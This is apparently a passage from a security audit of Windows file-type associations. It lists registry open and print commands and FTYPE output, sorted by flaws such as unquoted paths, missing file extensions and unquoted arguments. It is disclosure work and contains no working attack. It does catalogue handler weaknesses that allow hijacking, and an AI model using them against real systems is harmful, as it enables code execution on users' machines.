REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xslfile\shell\Open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\printto\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\certificate_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\contact_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\group_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\vcard_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /showexisting HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Hotmail\Protocols\mailto\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe "%ProgramFiles%\Internet Explorer\hmmapi.dll",MailToProtocolHandler %1 HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Hotmail\shell\open\command (Default) REG_EXPAND_SZ %systemRoot%\system32\rundll32.exe "%ProgramFiles%\Internet Explorer\hmmapi.dll",OpenInboxHandler HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\Windows Media Player\shell\open\command (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Media Player\wmplayer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\naom\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -extoff HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command (Default) REG_SZ C:\Program Files\Internet Explorer\iexplore.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.AddNetworkLocation\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.AddPrinter\command (Default) REG_EXPAND_SZ %systemroot%\system32\rundll32.exe printui.dll,PrintUIEntry /il HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.HistoryVaultRestore\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\FileHistory.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\0\{27dfca82-8593-46e4-98d8-23eb83452f65}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewEmail %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\1\{5099caf3-7ab4-4c18-ab35-3f3e664638e4}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewContact %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\2\{da8c976e-ec82-48ad-8ae4-38872e958dc5}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewGroup %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\3\{9d4b9c0a-7b4e-4c0d-926e-a536d781cff6}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnEdit %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\6\{0b51213d-c59c-4b59-bc10-f27d0b330294}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnImport HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\7\{165095b1-322d-47b1-bc9f-2a9234c1c4cb}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnExport HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\0\{5099caf3-7ab4-4c18-ab35-3f3e664638e4}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewContact %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\1\{da8c976e-ec82-48ad-8ae4-38872e958dc5}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewGroup %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\2\{0b51213d-c59c-4b59-bc10-f27d0b330294}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnImport HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\3\{165095b1-322d-47b1-bc9f-2a9234c1c4cb}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnExport End of search: 481 match(es) found.Note: only 207 of these 481 command lines comply with Microsoft’s own documentation, while the other 274 command lines show a total number of 411 bugs!
Command lines without a dot, i.e. without any file extension:
FTYPE | FIND.EXE /V "."
batfile="%1" %*
cmdfile="%1" %*
comfile="%1" %*
exefile="%1" %*
MSStorageSense=explorer ms-settings:storagesense
piffile="%1" %*
scrfile="%1" /S
Command lines without a backslash, i.e. without any qualified pathname:
FTYPE | FIND.EXE /V "\"
batfile="%1" %* brmFile="PrintBrmUI.exe" /import /file:"%1" cmdfile="%1" %* comfile="%1" %* exefile="%1" %* MSSppLicenseFile="iexplore.exe" "%1" MSStorageSense=explorer ms-settings:storagesense piffile="%1" %* regedit=regedit.exe "%1" regfile=regedit.exe "%1" scrfile="%1" /S
Command lines without a (double) quote:
FTYPE | FIND.EXE /V """"
CABFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 CompressedFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 Explorer.AssocActionId.BurnSelection=%SystemRoot%\explorer.exe Explorer.AssocActionId.EraseDisc=%SystemRoot%\explorer.exe Explorer.AssocActionId.ZipSelection=%SystemRoot%\explorer.exe Explorer.AssocProtocol.search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L Folder=%SystemRoot%\Explorer.exe hlpfile=%SystemRoot%\winhlp32.exe %1 inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 Microsoft.Workfolders=C:\Windows\System32\control.exe /name Microsoft.WorkFolders ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msime-imepad=C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 ms-msime-imjpdct=C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 MSStorageSense=explorer ms-settings:storagesense opensearchdescription=%SystemRoot%\explorer.exe P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 search=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L SHCmdFile=%SystemRoot%\explorer.exe SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 wbcatfile=%SystemRoot%\system32\sdclt.exe /restorepage webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines with an unquoted environment variable in the application’s pathname:
FTYPE | FIND.EXE "=%"
CABFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 CompressedFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 Diagnostic.Cabinet=%SystemRoot%\system32\msdt.exe /cab "%1" Diagnostic.Config=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Document=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Perfmon.Config=%SystemRoot%\system32\perfmon /sys /load "%1" Diagnostic.Perfmon.Document=%SystemRoot%\system32\perfmon /sys /open "%1" Diagnostic.Resmon.Config=%SystemRoot%\system32\perfmon /res /load "%1" evtfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" evtxfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" Explorer.AssocActionId.BurnSelection=%SystemRoot%\explorer.exe Explorer.AssocActionId.EraseDisc=%SystemRoot%\explorer.exe Explorer.AssocActionId.ZipSelection=%SystemRoot%\explorer.exe Explorer.AssocProtocol.search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L Folder=%SystemRoot%\Explorer.exe hlpfile=%SystemRoot%\winhlp32.exe %1 inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 mscfile=%SystemRoot%\system32\mmc.exe "%1" %* MSInfoFile=%SystemRoot%\system32\msinfo32.exe "%1" msstylesfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" opensearchdescription=%SystemRoot%\explorer.exe P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 pbkfile=%SystemRoot%\system32\rasphone.exe -f "%1" PerfFile=%SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 search=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L SHCmdFile=%SystemRoot%\explorer.exe SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 Undecided=%SystemRoot%\system32\OpenWith.exe "%1" Unknown=%SystemRoot%\system32\OpenWith.exe "%1" wbcatfile=%SystemRoot%\system32\sdclt.exe /restorepage webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 WindowsStore.License=%SystemRoot%\System32\licensemanagershellext.exe "%1" zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines with an unquoted long
argument:
FTYPE | FIND.EXE /I " %L"
IE.AssocFile.URL="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l InternetShortcut="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l rlogin="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l telnet="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l tn3270="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l WPDContextMenu.Url="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l
Command lines with an unquoted argument:
FTYPE | FIND.EXE " %1"
Application.Manifest="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbApplication %1 Application.Reference="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbShortcut %1|%2 CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 chm.file="%SystemRoot%\hh.exe" %1 CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 ftp="C:\Program Files\Internet Explorer\iexplore.exe" %1 giffile="C:\Program Files\Internet Explorer\iexplore.exe" %1 hlpfile=%SystemRoot%\winhlp32.exe %1 htmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 http="C:\Program Files\Internet Explorer\iexplore.exe" %1 https="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.HTM="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.MHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.PARTIAL="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.SVG="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.XHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.FTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTPS="C:\Program Files\Internet Explorer\iexplore.exe" %1 inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 mhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msdt="%SystemRoot%\system32\msdt.exe" %1 ms-msime-imepad=C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 ms-msime-imjpdct=C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 ms-quick-assist="%SystemRoot%\system32\quickassist.exe" %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 MSDASC=Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 prffile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 ratfile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 svgfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 xhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xslfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines with unquoted environment variable(s) in an argument or with unquoted argument(s):
FTYPE | FIND.EXE " %"
Application.Manifest="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbApplication %1 Application.Reference="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbShortcut %1|%2 batfile="%1" %* CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 chm.file="%SystemRoot%\hh.exe" %1 cmdfile="%1" %* comfile="%1" %* CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 exefile="%1" %* ftp="C:\Program Files\Internet Explorer\iexplore.exe" %1 giffile="C:\Program Files\Internet Explorer\iexplore.exe" %1 hlpfile=%SystemRoot%\winhlp32.exe %1 htafile=C:\Windows\System32\mshta.exe "%1" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}%U{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} %* htmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 http="C:\Program Files\Internet Explorer\iexplore.exe" %1 https="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.HTM="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.MHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.PARTIAL="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.SVG="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.URL="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l IE.AssocFile.WEBSITE="C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* IE.AssocFile.XHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.FTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTPS="C:\Program Files\Internet Explorer\iexplore.exe" %1 IMEDictionaryCompiler="%WINDIR%\system32\IME\SHARED\imewdbld.exe" "%1" %* inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 InternetShortcut="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l JSEFile=C:\Windows\System32\WScript.exe "%1" %* JSFile=C:\Windows\System32\WScript.exe "%1" %* mhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 Microsoft.System.Update.1="%systemroot%\system32\wusa.exe" "%1" %* Microsoft.Website="C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msdt="%SystemRoot%\system32\msdt.exe" %1 ms-msime-imepad=C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 ms-msime-imjpdct=C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 ms-quick-assist="%SystemRoot%\system32\quickassist.exe" %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 mscfile=%SystemRoot%\system32\mmc.exe "%1" %* MSDASC=Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 Msi.Package="%SystemRoot%\System32\msiexec.exe" /i "%1" %* Msi.Patch="%SystemRoot%\System32\msiexec.exe" /p "%1" %* msstylesfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 PerfFile=%SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 piffile="%1" %* prffile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 ratfile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 rlogin="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 svgfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 telnet="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 tn3270="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 VBEFile="%SystemRoot%\System32\WScript.exe" "%1" %* VBSFile="%SystemRoot%\System32\WScript.exe" "%1" %* webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 Windows.XamlDocument="C:\Windows\System32\PresentationHost.exe" "%1" %* Windows.Xbap="C:\Windows\System32\PresentationHost.exe" "%1" %* WPDContextMenu.Url="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l WSFFile="%SystemRoot%\System32\WScript.exe" "%1" %* WSHFile="%SystemRoot%\System32\WScript.exe" "%1" %* xhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xslfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines containing an environment variable:
SET SLOPPY=APPDATA CommonProgramFiles CommonProgramFiles(x86) CommonProgramW6432 ComSpec LOCALAPPDATA LOGONSERVER ProgramData ProgramFiles ProgramFiles(x86) ProgramW6432 PUBLIC SystemDrive SystemRoot TEMP TMP USERPROFILE WINDIR FTYPE | FINDSTR.EXE /I "%!SLOPPY: =% %!%"
